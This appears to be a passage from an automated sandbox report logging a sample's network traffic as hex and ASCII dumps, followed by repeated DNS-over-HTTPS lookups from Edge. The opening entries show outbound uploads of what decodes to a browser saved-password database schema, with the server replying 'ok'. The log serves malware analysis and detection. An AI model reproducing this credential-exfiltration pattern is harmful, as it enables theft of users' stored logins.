                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                            2024-12-27 06:11:12 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 4b 77 51 47 46 7a 38 5a 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68
                                                                                                                                                                                                                                                                            Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpKwQGFz8ZAQBpbmRleHNxbGl0ZV9h
                                                                                                                                                                                                                                                                            2024-12-27 06:11:12 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                            2024-12-27 06:11:12 UTC3313OUTData Raw: 6b 5a 58 68 69 63 6d 56 68 59 32 68 6c 5a 42 52 44 55 6b 56 42 56 45 55 67 53 55 35 45 52 56 67 67 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 64 47 46 69 62 47 56 66 61 57 35 6b 5a 58 67 67 54 30 34 67 59 6e 4a 6c 59 57 4e 6f 5a 57 51 67 4b 48 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 55 70 4c 78 41 47 46 30 4d 64 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 64 58 52 76 61 57 35 6b 5a 58 68 66 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 4d 57 4a 79 5a 57 46 6a 61 47 56 6b 45 34 49 66 44 77 63 58 48 52 30 42 68 42 46 30 59 57 4a 73 5a 57 4a 79 5a 57 46 6a 61 47 56 6b 59 6e 4a 6c 59 57 4e 6f 5a 57 51 53 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 47 4a 79 5a 57 46 6a 61 47 56 6b 49 43 68 31 63 6d 77 67 56 6b 46 53 51 30 68 42 55 69 42 4f 54 31
                                                                                                                                                                                                                                                                            Data Ascii: kZXhicmVhY2hlZBRDUkVBVEUgSU5ERVggYnJlYWNoZWRfdGFibGVfaW5kZXggT04gYnJlYWNoZWQgKHVybCwgdXNlcm5hbWUpLxAGF0MdAQBpbmRleHNxbGl0ZV9hdXRvaW5kZXhfYnJlYWNoZWRfMWJyZWFjaGVkE4IfDwcXHR0BhBF0YWJsZWJyZWFjaGVkYnJlYWNoZWQSQ1JFQVRFIFRBQkxFIGJyZWFjaGVkICh1cmwgVkFSQ0hBUiBOT1
                                                                                                                                                                                                                                                                            2024-12-27 06:11:14 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:11:14 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            2024-12-27 06:11:14 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            43192.168.2.650072162.159.61.34433880C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:11:13 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                            2024-12-27 06:11:13 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                            2024-12-27 06:11:14 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:11:13 GMT
                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                                            CF-RAY: 8f8726eb1f954393-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            2024-12-27 06:11:14 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 a1 00 04 8e fa b0 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            44192.168.2.650085162.159.61.34433880C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:11:13 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                            2024-12-27 06:11:13 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                            2024-12-27 06:11:13 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:11:13 GMT
                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                                            CF-RAY: 8f8726eb0d7441d2-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            2024-12-27 06:11:13 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 13 00 04 8e fb 28 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            45192.168.2.650078162.159.61.34433880C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:11:13 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                            2024-12-27 06:11:13 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                            2024-12-27 06:11:14 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:11:13 GMT
                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                                            CF-RAY: 8f8726eb3ceec425-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            2024-12-27 06:11:14 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 fa 00 04 8e fb 28 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            46192.168.2.650071162.159.61.34433880C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:11:13 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                            2024-12-27 06:11:13 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                            2024-12-27 06:11:14 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:11:13 GMT
                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                                            CF-RAY: 8f8726eb4f38729b-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            2024-12-27 06:11:14 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1d 00 04 8e fa 50 43 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcomPC)


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            47192.168.2.650084162.159.61.34433880C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:11:13 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                            2024-12-27 06:11:13 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                            2024-12-27 06:11:14 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:11:13 GMT
                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                                            CF-RAY: 8f8726eb2d7b43f8-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            2024-12-27 06:11:14 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 e4 00 04 8e fa b0 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            48192.168.2.650079162.159.61.34433880C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:11:13 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                            2024-12-27 06:11:13 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                            2024-12-27 06:11:14 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:11:13 GMT
                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                                            CF-RAY: 8f8726ebcf7c4299-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            2024-12-27 06:11:14 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 14 00 04 8e fb 29 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom))


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            49192.168.2.650091162.159.61.3443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:11:14 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                            2024-12-27 06:11:14 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                            2024-12-27 06:11:15 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:11:15 GMT
                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                                            CF-RAY: 8f8726f2fdf043a9-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            2024-12-27 06:11:15 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 2c 00 04 8e fa 41 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom,A)


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            50192.168.2.650092162.159.61.3443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
